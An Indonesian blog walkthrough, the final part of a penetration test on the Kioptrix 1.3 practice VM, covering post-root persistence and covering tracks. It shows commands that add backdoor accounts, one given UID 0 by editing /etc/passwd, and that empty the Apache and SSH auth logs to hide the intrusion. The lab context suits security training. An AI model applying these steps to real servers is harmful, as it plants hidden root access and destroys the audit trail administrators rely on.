Penetration Testing Kioptrix Server 1.3: Backdoor dan Menghapus Jejak [4]
Setelah mendapatkan akses root maka perlu segera membuat backdoor(pintu belakang) untuk bisa mengakses server lagi dengan mudah tanpa perlu cara panjang seperti sebelumnya. Dan juga diperlukan menghapus jejak yang telah dibuat agar tidak mudah diketahui oleh admin server jika terjadi perubahan.
Dalam kasus ini akan dibuat 2 user sebagai backdoor yaitu nanika sebagai user dengan akses terbatas dan luffy dengan akses super user (root).
- Jalankan perintah untuk membuat user nanika :
useradd nanika
lalu
passwd nanika
masukan password..
note: password yang diketika tidak akan terlihat pada terminal.
- Membuat home directory untuk user nanika :
mkdir /home/nanika
- Lalu modifikasi pada file
/etc/passwd
pada bagian nanika :
vim /etc/passwd
rubah bagian :
nanika:x:1003:1003::/home/nanika:/bin/sh
menjadi
nanika:x:1003:1003::/home/nanika:/bin/kshell
kesimpulan :
kshell artinya user nanika akan mendapatkan akses terbatas seperti waktu john pertama kali digunakan.
-
Selanjutnya check user nanika dengan login ssh sebagai nanika.
-
Buat lagi user dengan akses root. Terserah dengan nama apa :
useradd luffy
passwd luffy
mkdir /home/luffy
vim /etc/passwd
rubah bagian :
luffy:x:1004:1004::/home/luffy:/bin/sh
menjadi
luffy:x:0:0::/home/luffy:/bin/bash
kesimpulan :
bash artinya user luffy akan mendapatkan akses root.
.
-
Selanjutny adalah dengan menghapus jejak yang telah dilakukan. Agar tidak mudah diketahui admin kalau terjadi perubahan pada server.
-
Pertama-tama kembalikan hak akses john. Dengan edit file
/etc/passwd
dari
john:x:0:0:,,,:/home/john:/bin/bash
menjadi
john:x:1001:1001:,,,:/home/john:/bin/kshell -
Kembalikan hak akses file
/etc/passwd
dengan perintah :
chmod 644 /etc/passwd
-
Menghapus seluruh file log service. Setiap layanan http dan ssh akan menyimpan segala bentuk perubahan yang terjadi dalam koneksi layanan masing-masing. Seluruh file log berapa pada directory
/var/log
.
-
Dari seluruh list layanan pada log, pada kasus ini layanan apache2 dan ssh yang akan dihapus.
-
Pertama layanan apache2, masuk ke dalam directory apache dengan perintah :
cd /var/log/apache2
note: jangan dihapus tapi ditimpa saja agar isi file tersebut kosong.
berikut isi dari access.log.1 :
dapat dilihat pada gambar tersebut bahwa semua aktivitas penetrasi yang telah dilakukan tercatat disana dan bahkan ip address yang digunakan oleh penyerang tercatat disana.
- Selanjut timpa file tersebut agar menjadi kosong. ingat jangan dihapus. Dengan perintah :
echo>access.log
echo>access.log.1
echo>error.log
echo>error.log.1
- Selanjutnya adalah layanan ssh pada file
/var/log/auth.log
. untuk melihat isi file tersebut :
cat /var/log/auth.log
- Timpa dengan perintah :
echo>/var/log/auth.log
Gokiiiiiiiillll, Sampai sini telah selesai aktivitas penetrasi testing pada server Kioptrix 1.3.. Semoga bermanfaat dan jika ada salah mohon komentar dibawah sobat. Terimakasih. ^_^